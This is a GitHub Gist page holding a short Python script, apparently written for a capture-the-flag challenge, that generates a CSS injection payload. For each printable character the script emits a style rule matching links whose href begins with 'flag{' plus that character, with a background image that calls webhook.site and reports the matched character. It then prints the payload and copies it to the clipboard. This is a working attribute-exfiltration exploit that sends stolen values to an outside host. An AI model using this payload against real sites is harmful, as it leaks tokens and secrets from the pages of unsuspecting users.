Last active
July 31, 2024 04:44
-
-
Save hyuunnn/92ff99e1b557e09f2aef6adf53ea6ef7 to your computer and use it in GitHub Desktop.
css-injection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import string | |
| import pyperclip | |
| token = "token" | |
| flag = "flag{" | |
| payload = "<style>" | |
| for i in string.printable.split(" ")[0].replace("\"",""): # "처리에서 뭔가 문제가 있어서 일단 제거함 | |
| payload += 'a[href*="' + flag + i + '"]' + '{background-image: url(https://webhook.site/' + token + '?a=' + i + ');}' | |
| payload += "\n" | |
| payload += "</style>" | |
| print(payload) | |
| pyperclip.copy(payload) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment